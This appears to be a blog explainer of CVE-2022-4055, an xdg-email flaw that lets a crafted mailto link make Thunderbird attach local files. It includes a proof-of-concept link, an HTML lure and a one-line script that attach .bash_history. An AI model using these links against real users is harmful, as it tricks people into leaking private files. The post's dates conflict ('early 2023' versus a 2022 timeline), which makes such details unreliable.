In early 2023, a vulnerability was discovered in how xdg-email (part of xdg-utils) handles mailto URLs when Thunderbird is the configured mail client. The flaw, assigned CVE-2022-4055, may seem harmless at first—but in reality it might let attackers trick users into sending emails with files they never meant to attach. In this post, we’ll break down how this vulnerability works, walk through a proof-of-concept, and show what you can do to protect yourself.
What Is xdg-email and How Does It Work?
xdg-utils is a set of scripts found on many Linux distributions for opening URLs, emails, and more with a desktop’s default applications. xdg-email lets a web page or app open your mail client with a pre-filled message.
Normally, a link like this
mailto:someone@example.com?subject=Hello&body=Test%20message
…just opens your email client, fills in the details, and nothing more.
But when Thunderbird is the default, the way it parses those extra details isn’t always safe—especially when attackers try to be sneaky with less common parameters.
The Vulnerability: Paring Extra Headers & Attachments
CVE-2022-4055 arises because xdg-email doesn’t fully sanitize extra fields passed in for Thunderbird, so attackers can embed fields that shouldn’t be allowed. Specifically, it allows arbitrary Thunderbird command-line parameters to be injected using the mailto URL, including attach to add a file attachment.
According to RFC 2368, only certain headers (like subject and cc) should be accepted in a mailto link. xdg-email didn’t filter these, so attackers could add things like attach=, which Thunderbird understands as “add this file as attachment.”
Imagine this link
mailto:friend@example.com?subject=Check%20this%20out!&attach=/home/user/.bash_history
If a user clicks this on their Linux desktop, and Thunderbird is their mail client, it opens a new mail window with their .bash_history file (a shell command log) attached—without their conscious intent.
Malicious HTML Link
<a href="mailto:friend@example.com?subject=Report&body=Here%20you%20go!&attach=/home/user/.bash_history">Send Report</a>
When clicked, this triggers xdg-email, which wrongly passes the attach parameter to Thunderbird.
With vulnerable xdg-email, the translation is roughly
thunderbird "mailto:friend@example.com?subject=Report&body=Here%20you%20go!&attach=/home/user/.bash_history"
But Thunderbird interprets attach specially, and attaches the specified file automatically.
Proof-of-Concept Bash Script
# Save as exploit.sh and run:
xdg-email "mailto:friend@example.com?subject=hello!&attach=/home/$USER/.bash_history"
When you run this on your system (do NOT actually send the email!), Thunderbird pops up with the .bash_history file attached.
Why Is This Dangerous?
- Unintentional Disclosure: Hidden or sensitive files on your system could be attached silently, if a crafted link points to them.
- Deceptive Links: URLs look normal to humans in a webpage or email (since attach is just another field), so people are more likely to trust and click.
- Automatable & Remote: Such attacks can be embedded in any web page or sent by email as a clickable link.
The fix is to filter out any fields in mailto URLs that aren’t standard, like attach=.
- xdg-utils GitLab issue and patch
- Thunderbird bug tracker
Update your system’s xdg-utils and Thunderbird to the latest versions to be safe.
Update software regularly.
- Don’t click strange mail links—especially if they point to local files or use strange parameters.
Double-check new message attachments before sending.
- Limit permissions on confidential files, or move them out of places attackers might guess (e.g., home directory).
GitHub Proof-of-Concept
Some researchers have posted simple test cases for this vulnerability, for example:
- https://github.com/vanhauser-thc/thc-security-archive/blob/master/thunderbird/xdg-email-attach-exploit.md
Conclusion
CVE-2022-4055 is an example of how desktop integration features, meant to make life easier, can become security pitfalls if not carefully locked down. Always keep an eye on what hidden tricks may be lurking in simple features like “send email” links, and keep your software fresh.
References & Further Reading
- CVE-2022-4055 on NVD
- Exploit details on HackerOne
- xdg-utils project
- RFC 2368 (Mailto: URL scheme)
- Original bug report
Timeline
Published on: 11/19/2022 00:15:00 UTC
Last modified on: 11/26/2022 03:18:00 UTC